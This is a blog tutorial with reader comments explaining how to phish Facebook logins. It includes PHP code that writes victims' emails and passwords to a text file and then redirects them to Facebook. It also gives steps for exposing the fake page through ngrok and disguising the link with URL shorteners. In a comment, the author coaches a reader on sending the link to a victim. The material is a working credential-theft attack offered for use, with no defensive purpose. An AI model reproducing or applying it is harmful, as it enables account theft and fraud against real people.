How can Hackers Hack Facebook Account using Phishing Attack ?
1. Termux application in Android phone
Login.php
The below code will fetch the values from the login form and create a usernames.txt file into the htdocs folder. In this file, you will see the victim’s username and password.
<?php
file_put_contents(“usernames.txt”, “Account: ” . $_POST[’email’] . ” Pass: ” . $_POST[‘pass’] . “n”, FILE_APPEND);header(‘Location: https://www.facebook.com’);exit();?>
Table of Contents
Index.php
<?php
header(‘Location: login.html’);
exit();?>
Steps for Phishing Attack :
Step-1: Download the files from here ➡️ Facebook Account using Phishing Attack.
Step-2: Extract the files and put it into the htdocs folder
Step-3: Run the Kick web server. Make sure your kick web server in On condition during this process otherwise it will not open the phishing page.
Step-4: Open the termux application and type ./ngrok HTTP 8080 and you will get this screen like this. Basically, Ngrok will create a secure tunnel between you and the victim.
As you can see in the upper image there are 2 links provided by Ngrok Http & Https. You can Send one of the links to the victim. Ahh! this URL looks fake we can do one thing. To increase the success rate we can use URL shortener websites.
For Example Google URL Shortener, Bitly
Read Also: Basic Linux commands list with example and syntax for Beginners
Here in this post, I have created my own Android web server but you can also purchase free domain names from other free hosting service providers.
You can put those files into their servers. To do that you can read this post also
Get free hosting to do Phishing Attack.
Please let me recognize if you found this post helpful or not, leave a comment below to let me recognize another space you’d have an interest in reading posts regarding.
Subscribe my Newsfeed to get the latest post updates.
I'm a beginner Pythom Programer, also I am a beginner in kali Linux User. I find your articles very detailed and easy to follow. Thank You cs1
Your Welcome 🙂
madtttyy89 yeloyiya 8080 vb name
I really appreciate this forum; it's been of great help to me. But I don't understand how I can lauch the phishing attack on my victim on Facebook. If anyone can help me get the phishing attack ready for my execution Iwould be much delighted.
Thanks for your appreciation!!
You have to send that link which is generated by ngrok and one more thing you can do to increase success rate by using url shortner tool.. Just put that ngrok link to the url shortner and you will get the link and send it to the victim and you are good to go.